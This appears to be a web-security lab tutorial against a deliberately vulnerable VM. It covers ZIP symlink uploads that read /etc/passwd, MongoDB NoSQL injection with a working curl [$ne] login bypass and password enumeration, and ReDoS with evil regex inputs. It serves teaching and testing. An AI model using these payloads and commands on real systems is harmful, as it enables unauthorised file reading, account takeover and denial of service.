### ZIP symlinks attack
An  archive can contain a symbolic link. A symbolic link is a special file that links to another file. By uploading a zip containing a symbolic link, and after the zip is extracted, you can access the symbolic link to gain access to files that you should not get access to. To do so, you need to get your symbolic link to point to files outside of the web root, for example `/etc/passwd`.

These types of issues are typically found when a developer allows to accept zip files in the upload functionality and then uzips these files after receiving them on the server. This creates a potential vulnerability.

Basically, when a user uploads the zip file into such an application, then the app really appears to be vulnerable in case it simply takes the zip file and extracts its files without any validations. This allows for an exploit.

The code is available on the __VulnVM__ at the `/zip.php` endpoint
and locally in `/var/www/html/zip.php`
After uploading a specially purposed .zip file, we can view the .zip file and unpacked files un under the `/uploads` endpoint

```sh
# First we need link file with new name ( as same as shortcut )
sudo ln -s /etc/passwd shortcut_to_passwd
# When we cat the file
cat shortcut_to_passwd
# We see /etc/passwd because shortcut_to_passwd point to /etc/passwd
# Next we create zip archive with symbolic links
sudo zip --symlinks test.zip shortcut_to_passwd
```

Finally, we upload this file to __VulnVM__ at the `/zip.php` endpoint.
When the backend code extracts the archive, we get can view the content of the linked shortcut_to_passwd file to the VulnVM local /etc/passwd file and we can read its content


### NoSQL Injection
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Thus, multiple web applications use them to speed up the performance and allow more flexibility during the application's growth. 

Most popular NoSQL databases systems (according to [db engines ranking](https://db-engines.com/en/ranking)) include:
- MongoDB https://db-engines.com/en/system/MongoDB
- Redis https://db-engines.com/en/system/Redis
- Elasticsearch https://db-engines.com/en/system/Elasticsearch
- Cassandra https://db-engines.com/en/system/Cassandra
- Splunk https://db-engines.com/en/system/Splunk
- Neo4j https://db-engines.com/en/system/Neo4j

These database management systems have been installed millions of times and gained greater stability over time. However, these DBMSes are still potentially vulnerable to injection attacks, even if they aren’t using the traditional SQL syntax. Because these NoSQL injection attacks may execute within a procedural language, rather than in the declarative SQL language, the potential impacts are greater than of the traditional SQL injections.

A NoSQL database calls are written in the application’s programming language (like PHP, Python, Java, node.js, Ruby, etc.) and transformed via a relevant library to a custom API call, or formatted according to a common convention (such as XML, JSON, LINQ, etc). 

Malicious input targeting those specifications of dbms calls may not trigger application's sanitization checks. For example, filtering out common HTML special characters such as < > & ; will not prevent attacks against a JSON API, where special characters include `/` `{` `}` `:`.

There're plenty of vulnerabilities related with NoSQL DBMSes. We'll focus now on an example related to MongoDB (the most popular NoSQL database system).

##### Vulnerable code snippet
Below is a seemingly good looking PHP code excerpt that takes the username and password parameters from the HTTP POST form, transforms them to PHP variables. 
Next, a connection with MongoDB Client is established. A MongoDB instance is available on localhost via port 27017. Finally, a request to the database is made that searches the users table by username and password.

The code is available on the __VulnVM__ at the `/homepage.php` endpoint
and locally in `/var/www/html/homepage.php`

```php
$username = $_POST['username'];
$password = $_POST['password'];
$connection = new MongoDB\Client('mongodb://localhost:27017');
if($connection) {
	$db = $connection->test;
	$users = $db->users;
	$query = array(
		"user" => $username,
		"password" => $password
	);
	$req = $users->findOne($query);
}
```

Even though the above code seems to be a properly syntaxed PHP, the app certainly isn't safe, for many reasons. However, we'll focus only on the possibility of NoSQL injection by using operators like: `[$ne]`, `[$lt]`, `[$gt]`, `[$regex]`
The [$ne] query operator means not equal. Therefore, if we succeed injecting it into the `$username` or `$password` variable, the resulting query will find the first record in which the
- __username__ is say __admin__
- and the __password__ is say __not foo__

If the above code is used for authentication, the attacker is going to be logged in as the admin user by successfully using the above idea. 

More operators can be used in a similar fashion, for example [$lt] and [$gt] as well as [$regex]. Regular expressions can even allow the attacker to enumerate all users in the above scenario by trying combinations in sequence and evaluating the result.

##### MongoDB NoSQL Injection attack
Let's now, focus on exploiting the vulnerable code presented above
by interacting with the `/homepage.php` sign up form. We can play around with the form a bit.

First, we have identified the target to attack (the sign-up form). 
Next, we can try to carry out an SQL injection attack.
```sh
# It's quite easy because we need only a payload like:
admin' or '1'='1 
# we can see that an a SQL injection is not working here
```

Now, let's try something different for example MongoDB injection:
We'll make a POST request to http://vuln.vms.perkmylife.com/homepage.php
by providing the following request body:
```sh
password[$ne]=test&username[$ne]=test

# We'll send a crafted POST request:
curl -L -c "/tmp/cookie" "http://vuln.vms.perkmylife.com/homepage.php" -X POST -d 'password[$ne]=test&username[$ne]=test' -vvv
```
Oops, and we have access to the admin panel

Now, since we've exploited the backend code that allowed it due to the lack of input sanitization, we should try to extract more data from the database. 
We can achieve that using a github tool for NoSQL Injection
https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
```sh
git clone https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
cd Nosql-MongoDB-injection-username-password-enumeration/

python3 nosqli-user-pass-enum.py -u http://vuln.vms.perkmylife.com/homepage.php -up username -pp password -ep username
# where -up and -pp is name of parameter from HTML form and -ep is parameter to enumerate
```
We get the username `admin`. Now, we can analogically try to enumerate the password
```sh
python3 nosqli-user-pass-enum.py -u http://vuln.vms.perkmylife.com/homepage.php -up username -pp password -ep password
```
NoSQL Injection is successful, we have the password `admin:StrongPassword`

A good recommendation for the owner or the programmer of this app would be to add a security layer to the user authentication process. This would include at least:
- input sanitization, 
- password hashing and salting
- CSRF token on the form


### Regular expression Denial of Service - ReDoS
The Regular expression Denial of Service (ReDoS) is a Denial of Service attack that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to the input size). An attacker can then cause a program using a Regular Expression (Regex) to enter these extreme situations and then hang for a very long time. This would most probably cause a Denial of Service.

The parts of webs application that are the most vulnerable to this type of attack are usually related to one or another way of searching or text comparisons, by using functions like: 
- `preg_match` for __PHP__ 
- or `REGEXP` for MySQL 
- or `java.util.regex.Matcher`/`java.util.regex.Pattern`
- and other REGEX capable classes or functions available in other technologies

##### The problematic Regex naive algorithm
The Regex naive algorithm builds a Nondeterministic Finite Automaton (NFA), which is a finite state machine where for each pair of state and input symbol there may be several possible next states. Then the engine starts to make transition until the end of the input. Since there may be several possible next states, a deterministic algorithm is used. This algorithm tries one by one all the possible paths (if needed) until a match is found (or all the paths are tried and fail).
This in most cases overloads many powerful CPUs or causes RAM exhaustions.


Vulnerable Regex commands available in online repositories:
[ReGexLib,id=1757 (email validation)](http://regexlib.com/REDetails.aspx?regexp_id=1757) - see bold part, which is an Evil Regex
```sh
^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$
# Input:
aaaaaaaaaaaaaaaaaaaaaaaa!
```

[OWASP Validation Regex Repository](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository), Java Classname - see bold part, which is an Evil Regex
```sh
^(([a-z])+.)+[A-Z]([a-z])+$
# Input:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
```